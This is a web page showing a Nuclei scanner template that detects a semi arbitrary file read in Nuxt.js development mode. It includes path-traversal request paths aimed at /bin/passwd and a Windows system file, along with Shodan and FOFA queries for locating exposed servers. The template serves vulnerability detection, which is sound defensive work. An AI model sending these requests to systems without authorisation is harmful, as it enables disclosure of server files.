Semi Arbitrary File Read in Dev Mode - Nuxt.js

ID: nuxt-js-semi-lfi

Severity: medium

Author: DhiyaneshDK

Tags: huntr,lfi,nuxtjs

Description

Arbitrary File Read in Dev Mode in Nuxt.js

YAML Source

id: nuxt-js-semi-lfi

info:
  name: Semi Arbitrary File Read in Dev Mode - Nuxt.js
  author: DhiyaneshDK
  severity: medium
  description: Arbitrary File Read in Dev Mode in Nuxt.js
  reference:
    - https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
    - https://bryces.io/blog/nuxt3
    - https://twitter.com/fofabot/status/1669339995780558849
  classification:
    cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: nuxt
    product: framework
    shodan-query: html:"buildAssetsDir" "nuxt"
    fofa-query: body="buildAssetsDir" && body="__nuxt"
  tags: huntr,lfi,nuxtjs

http:
  - method: GET
    path:
      - "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"
      - "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"plugin":'
          - '"pluginCode":'
          - '"id":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4a0a004730450220690f5605c73c818a9ad013d75b55d409d1d0c135c7e0cc3ede61b1fa20a4dde3022100c3ec9ed9c5e719977feca07683c0d6e6dd6c9c7cb7a19e91b145c0fb95684954:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml"

View on Github